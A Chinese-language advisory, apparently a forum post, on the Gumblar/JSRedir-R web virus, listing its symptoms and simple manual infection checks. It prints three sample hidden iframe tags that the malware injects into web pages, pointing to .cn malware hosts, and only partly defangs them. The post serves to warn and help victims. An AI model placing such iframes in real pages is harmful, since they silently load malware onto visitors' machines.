病毒 JSRedir-R/GENO/gumblar

行為：
竄改網頁資料，加入或取代 類似下列的惡意 iframe 代碼：(避免Google誤判此頁，部份符號改為全形)
＜iframe src="http://bigbestlite．cn:8080/index．php" width="169" height="113" style="visibility: hidden"＞＜/iframe＞
＜iframe src="http://shopvideocommission.cn:8080/index.php" width="135" height="189" style="visibility: hidden"＞＜/iframe＞
＜iframe src="http://yourlotcar.cn:8080/index.php" width="100" height="145" style="visibility: hidden"＞＜/iframe＞

感染病毒的主要徵兆為：
。sqlsodbc.chm 數值改變
　(請至C槽>WINDOWS>system32>找到sqlsodbc.chm檔案，以右鍵方式查看數值，正常OS中文使用者大小應為52,378 b)
。無法執行cmd.exe、regedit.exe
。AntiVirusKitt 軟體無法更新
。無法連上特定網站如Windows Update、AntiVirusKitt 相關網站
。網路連線被監視，使用者名稱密碼遭盜用
。Google的搜索結果被竄改
。瀏覽器異常中止
。Acrobat 軟體自動跳出並啟動
。PDF檔案無端增值佔用電腦空間
。記憶體使用量大幅增加
。重新啟動時看見地獄般的藍色錯誤畫面

中毒檢測方法：
方法1.
Windows (XP、2000、VISTA) 系統共用：
。開始→執行→輸入 cmd.exe →確定
→出現黑色視窗，表示沒有問題便可直接關掉，進行下面●步驟
→沒有任何反應，很可能已經被感染

●同時按住Ｒ鍵和WINDOWS開始鍵，再度叫出執行視窗
→出現登錄編輯程式視窗，表示沒有問題便可直接關掉
→若沒有任何反應，很可能已經被感染

方法2.
－－－(檢測方式翻譯來自K島善心島民No.39296)－－－
快速檢查自已電腦有沒有被感染的方法(XP)
首先先按ctrl+alt+del叫出工作管理員
選擇"處理程序"
點一下"影像名稱"讓排序順序照著英文字母
尋找"SVCHOST.EXE"

只要SVCHOST.EXE後面的使用著名稱如果是
「SYSTEM」「NETWORK SERVICE」「LOCAL SERVICE」其中一種的話表示還沒被感染
－－－(謝謝善心島民No.39296翻譯)－－－

參考網站：

小心新病毒「JSRedir-R」（GENO/gumblar）
Ayuda de Webmasters
'Gumblar' attacks spreading quickly
專家稱Gumblar表現活躍 猛於Conficker病毒
Clickjacking: Hijacking clicks on the Internet
注意!! 經由同人網站進行大幅擴散的病毒
看網頁就會中的病毒：JSRedir-R（通稱GENO病毒）5/26更新檢測用網站